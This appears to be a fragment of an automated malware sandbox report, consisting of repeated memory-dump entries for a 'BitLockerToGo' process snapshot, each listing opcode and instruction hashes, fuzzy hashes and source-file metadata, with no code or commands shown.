                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                    • Instruction Fuzzy Hash: 6C114C33A081E00EC3168D3C8500566BFA32A97634F1D539AF4B49B3D3D7278D8B9369
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fe1456515a9edc830b27937bd2ea67c7b0c014683399f621d5d944aff22c083c
                                                                                    • Instruction ID: c50ce8cf9c5f9d345d43c63e05a9bff61589088a4a1618f9609e7476a1dc71ea
                                                                                    • Opcode Fuzzy Hash: fe1456515a9edc830b27937bd2ea67c7b0c014683399f621d5d944aff22c083c
                                                                                    • Instruction Fuzzy Hash: EF019EF1B0231247D7209E11A4C1B2BB6A86F94748F58443EE80967342DFBEFC05C29A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 967e6cb9ea21bc44fcd4b8d920d1a98461da43aa88d1223373553775f3b866f5
                                                                                    • Instruction ID: 48cd2bf5a38dda26d43492ad7cd4619b8b65fe667581452ef5a3b5f5612d356d
                                                                                    • Opcode Fuzzy Hash: 967e6cb9ea21bc44fcd4b8d920d1a98461da43aa88d1223373553775f3b866f5
                                                                                    • Instruction Fuzzy Hash: 0B01D27AB582048BE3448F75ACC13BBB792E7C2211F15E03DE48693295DD74E9469609
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76fd8bc342387add2a092c5241631615185f55dff440682e140d6b8b38744bd4
                                                                                    • Instruction ID: ee3202f4c7b97d86cec6d154009762f68b7b73f0fade54c8394ff9d3109274f1
                                                                                    • Opcode Fuzzy Hash: 76fd8bc342387add2a092c5241631615185f55dff440682e140d6b8b38744bd4
                                                                                    • Instruction Fuzzy Hash: 5F01A93BE91B209BC3244FB8DDC226BEBE1EB59315F1D567EC981AB741C15C9C014794
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 503ff2e71cab218a3968d2c3fb4ca380df2623b62e847c146365de6c103bc151
                                                                                    • Instruction ID: f57f4cf8da5334abe639b22c9070b7f824a33ddb09cdb4d81ecdbf7b59264ff9
                                                                                    • Opcode Fuzzy Hash: 503ff2e71cab218a3968d2c3fb4ca380df2623b62e847c146365de6c103bc151
                                                                                    • Instruction Fuzzy Hash: 81D05B76C01601AFC7216F79EC027047DF1FF97345F0920B6901492135FF714150965B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26bc815a613c1751be835ce015be72e18a4da537f3dbe6440cfc7d58633fbcab
                                                                                    • Instruction ID: 46708560f6ca2d1dc46b348cf292d49f35cc9a01d59c3a157677fa6b0df29c1c
                                                                                    • Opcode Fuzzy Hash: 26bc815a613c1751be835ce015be72e18a4da537f3dbe6440cfc7d58633fbcab
                                                                                    • Instruction Fuzzy Hash: ECB092A9C0A5118AE1222B123D028AAB0241A13348F182036E80632246AAAAF21A41AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6e8ec0da43f4966af9c80c68cfa9382619b99c9117e0d001fc58a2c7e1a0e3d2
                                                                                    • Instruction ID: 22b160710237bc1a3139db92fe2d56dc42599ca93603099b58035b78777ca6b4
                                                                                    • Opcode Fuzzy Hash: 6e8ec0da43f4966af9c80c68cfa9382619b99c9117e0d001fc58a2c7e1a0e3d2
                                                                                    • Instruction Fuzzy Hash: 07B011A8E0820082C000AF00A8028BAB2388A0B20AF203030E808B3202EA28F200828F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3b137f54b60282bb78b724cbeb6a83ac7cf5062442489467fd4f716218ed2886
                                                                                    • Instruction ID: f3676da94ab42f47244ed0b0df57d6e577ccfcf37e1cffb6cabbbc84becdf206
                                                                                    • Opcode Fuzzy Hash: 3b137f54b60282bb78b724cbeb6a83ac7cf5062442489467fd4f716218ed2886
                                                                                    • Instruction Fuzzy Hash: 55A00228E5C000869A08CF20A9516B1E2B95B6FA02F6134288005B7452D910D900851D